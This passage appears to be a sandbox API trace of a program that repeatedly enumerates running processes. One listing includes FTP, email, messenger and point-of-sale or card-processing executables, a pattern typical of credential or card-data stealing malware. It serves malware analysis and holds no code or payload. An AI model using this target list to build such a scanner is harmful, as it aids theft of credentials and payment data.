szExeFile="absolutetelnet.exe")) returned 1 [0231.794] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0231.797] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0231.799] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0231.801] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0231.803] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0231.805] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0231.807] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0231.809] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0231.812] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0231.814] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0231.816] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0231.818] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0231.821] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0231.823] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0231.867] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0231.871] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0231.874] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0231.877] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0231.880] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0231.882] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0231.885] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0231.888] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0231.891] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0231.894] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0231.896] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0231.899] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0231.902] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0231.925] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0231.928] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0231.931] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0231.934] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0231.938] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0231.940] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0231.943] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0231.946] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0231.948] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0231.951] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0231.960] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0231.962] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0231.964] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0231.973] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0231.976] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0231.978] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0231.980] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0231.983] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0231.986] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0231.988] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0231.990] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0231.993] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0231.995] Process32Next (in: hSnapshot=0x1950, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0231.997] CloseHandle (hObject=0x1950) returned 1 [0231.997] Sleep (dwMilliseconds=0x64) [0232.139] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2268 [0232.187] Process32First (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.189] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0232.191] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0232.194] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.196] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0232.199] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.201] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0232.203] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0232.205] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0232.249] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.251] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.253] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0232.254] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.256] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.258] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.259] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.261] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.264] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.267] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.269] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0232.271] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0232.273] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.275] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0232.277] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.279] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0232.281] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0232.283] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0232.284] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0232.286] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0232.326] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0232.330] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.332] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.335] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0232.337] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.342] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: 